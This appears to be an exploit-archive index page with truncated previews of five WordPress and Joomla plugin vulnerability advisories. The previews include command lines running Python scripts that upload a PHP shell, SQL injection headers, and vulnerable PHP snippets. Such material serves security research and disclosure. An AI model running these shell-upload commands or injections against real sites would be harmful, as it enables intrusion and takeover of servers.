Wordpress

WordPress and Joomla Creative Contact Form Unauthenticated Shell Upload Vulnerability

claudio@backbox3:~$ python wp_j00m_creative_contact_form_shell_upload.py -t http://127.0.0.1/wordpress -f shell.php -c wordpress ___ ___ __ __,-,__ | Y .-----.----.--| .-----.----.-----.-----. | ' '__| |. | | _ | _| _ | _ | _| -__|__ --| | __| |. / \ |_____|__| |_____| __|__| |_____|_____| |_______| |: | _______ |__| __ |_| |::.|:. | | _ .-----.-----.--------| .---.-. `--- ---' |___| | _ | _ | | | _ | |. | |_____|_____|__|__|__|__|___._| |: 1 | |::....

WordPress CP Multi View Event Calendar 1.01 Sql Injection

###################### # Exploit Title : WordPress CP Multi View Event Calendar 1.01 SQL Injection Vulnerability # Exploit Author : Claudio Viviani # Software Link : https://downloads.wordpress.org/plugin/cp-multi-view-calendar.zip # Date : 2014-10-23 # Tested on : Windows 7 / Mozilla Firefox Windows 7 / sqlmap (0.8-1) Linux / Mozilla Firefox Linux / sqlmap 1.0-dev-5b2ded0 ###################### # Description CP Multi View Event Calendar 1.01 suffers from SQL injection vulnerability calid variable is not sanitized....

WordPress Slideshow Gallery 1.4.6 Shell Upload Exploit + Demo

[claudio@localhost ~]$ python wp_gallery_slideshow_146_suv.py -t http://localhost/wordpress -u editor -p editor -f sh33l.php $$$$$$\ $$\ $$\ $$\ $$\ $$ __$$\ $$ |\__| $$ | $$ | $$ / \__|$$ |$$\ $$$$$$$ | $$$$$$\ $$$$$$$\ $$$$$$$\ $$$$$$\ $$\ $$\ $$\ \$$$$$$\ $$ |$$ |$$ __$$ |$$ __$$\ $$ _____|$$ __$$\ $$ __$$\ $$ | $$ | $$ | \____$$\ $$ |$$ |$$ / $$ |$$$$$$$$ |\$$$$$$\ $$ | $$ |$$ / $$ |$$ | $$ | $$ | $$\ $$ |$$ |$$ |$$ | $$ |$$ ____| \____$$\ $$ | $$ |$$ | $$ |$$ | $$ | $$ | \$$$$$$ |$$ |$$ |\$$$$$$$ |\$$$$$$$\ $$$$$$$ |$$ | $$ |\$$$$$$ |\$$$$$\$$$$ | \______/ \__|\__| \_______| \_______|\_______/ \__| \__| \______/ \_____\____/ $$$$$$\ $$\ $$\ $$\ $$\ $$\ $$$$$$\ $$ __$$\ $$ |$$ | $$$$ |$$ | $$ | $$ __$$\ $$ / \__| $$$$$$\ $$ |$$ | $$$$$$\ $$$$$$\ $$\ $$\ \_$$ |$$ | $$ | $$ / \__| $$ |$$$$\ \____$$\ $$ |$$ |$$ __$$\ $$ __$$\ $$ | $$ | $$ |$$$$$$$$ | $$$$$$$\ $$ |\_$$ | $$$$$$$ |$$ |$$ |$$$$$$$$ |$$ | \__|$$ | $$ | $$ |\_____$$ | $$ __$$\ $$ | $$ |$$ __$$ |$$ |$$ |$$ ____|$$ | $$ | $$ | $$ | $$ | $$ / $$ | \$$$$$$ |\$$$$$$$ |$$ |$$ |\$$$$$$$\ $$ | \$$$$$$$ | $$$$$$\ $$\ $$ |$$\ $$$$$$ | \______/ \_______|\__|\__| \_______|\__| \____$$ | \______|\__|\__|\__|\______/ $$\ $$ | \$$$$$$ | \______/ W0rdpr3ss Sl1d3sh04w G4ll3ry 1....

WordPress Spider Facebook 1.0.8 Authenticated SQL Injection

###################### # Exploit Title : WordPress Spider Facebook 1.0.8 Authenticated SQL Injection # Exploit Author : Claudio Viviani # Vendor Homepage : http://web-dorado.com/ # Software Link : http://downloads.wordpress.org/plugin/spider-facebook.1.0.8.zip # Date : 2014-08-25 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox # Linux / sqlmap 1.0-dev-5b2ded0 ###################### # Location : http://localhost/wp-content/plugins/plugins/spider-facebook/facebook.php ###################### # Vulnerable code : function Spider_Facebook_manage() { require_once("facebook_manager.php"); require_once("facbook_manager.html.php"); if(!function_exists ('print_html_nav' )) require_once("nav_function/nav_html_func....

WordPress Huge-IT Image Gallery 1.0.1 SQL Injection

###################### # Exploit Title : WordPress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection # Exploit Author : Claudio Viviani # Vendor Homepage : http://huge-it.com/ # Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip (Fixed) Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs # Date : 2014-08-25 # Tested on : Windows 7 / Mozilla Firefox # Linux / Mozilla Firefox # Linux / sqlmap 1.0-dev-5b2ded0 ###################### # Location : http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php ###################### # Vulnerable code : function editgallery($id) { global $wpdb; if(isset($_GET["removeslide"])){ if($_GET["removeslide"] !...